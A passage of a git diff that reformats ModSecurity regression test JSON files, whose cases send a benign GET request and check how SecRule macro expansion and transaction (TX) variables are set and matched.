(.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?resource=whee", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?resource=whee", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ + "" ] }, - "expected":{ - "audit_log":"", - "debug_log":"RESOURCE:whee::webappid::test", - "error_log":"" + "expected": { + "debug_log": "RESOURCE:whee::webappid::test", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecWebAppId webappid", "SecRule ARGS:resource \"@unconditionalmatch \" \"phase:2,pass,initcol:resource=%{ARGS.resource},id:900003\"", diff --git a/test/test-cases/regression/collection-tx-with-macro.json b/test/test-cases/regression/collection-tx-with-macro.json index a0173b6bb6..7225e2f3e3 100644 --- a/test/test-cases/regression/collection-tx-with-macro.json +++ b/test/test-cases/regression/collection-tx-with-macro.json @@ -1,173 +1,176 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:somethingPHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something%{REQUEST_HEADERS:Cookie}%\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"310\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"310\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=%{REQUEST_HEADERS:Keep-Alive}%\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", @@ -175,58 +178,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (with macro) (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 - }, - "server":{ - "ip":"200.249.12.31", - "port":80 - }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (with macro) (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" - }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] + }, + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"5\" \\(Variable: TX:something_else\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"5\" \\(Variable: TX:something_else\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something_else=%{tx.something}%\"", diff --git a/test/test-cases/regression/collection-tx.json b/test/test-cases/regression/collection-tx.json index 07099405f7..98d91b55aa 100644 --- a/test/test-cases/regression/collection-tx.json +++ b/test/test-cases/regression/collection-tx.json @@ -1,212 +1,217 @@ [ - { + { "enabled": 1, - "version_min":300000, - "version_max":0, - "title":"Collection :: TX full vs partial match", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "version_min": 300000, + "version_max": 0, + "title": "Collection :: TX full vs partial match", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)" }, - "uri":"/", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text/xml; charset=utf-8\n" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n" }, - "body":[ + "body": [ "\n" ] }, - "expected":{ - "http_code":200 + "expected": { + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REMOTE_ADDR \"@unconditionalMatch\" \"id:1,deny,setvar:TX.partial_match=1,chain\"", "SecRule TX.partial \"@gt 0\" \"id:2,t:lowercase,t:none,status:444\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (1/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (1/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"to_test\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"to_test\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=to_test\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (2/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (2/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"1\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"1\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something\"", "SecRule TX \"@contains to_test\" \"id:2,t:lowercase,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (3/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (3/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"20\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"20\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", @@ -214,58 +219,59 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (4/4)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (4/4)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" }, - "body":[ + "body": [ "\n\r", - "\n\r", + "\n\r", " \n\r", - " \n\r", - " string<\/EnlightenResult>\n\r", - " <\/EnlightenResponse>\n\r", - " <\/soap:Body>\n\r", - "<\/soap:Envelope>\n\r" + " \n\r", + " string\n\r", + " \n\r", + " \n\r", + "\n\r" ] }, - "expected":{ - "audit_log":"", - "debug_log":"Target value: \"15\" \\(Variable: TX:something\\)", - "error_log":"" + "expected": { + "debug_log": "Target value: \"15\" \\(Variable: TX:something\\)", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,setvar:TX.something=+10\"", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:2,t:lowercase,t:none,setvar:TX.something=+10\"", @@ -274,59 +280,60 @@ ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "title":"Testing collection :: TX (5/n)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing collection :: TX (5/n)", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie I", - "Cookie2":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - cookie II", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120 - 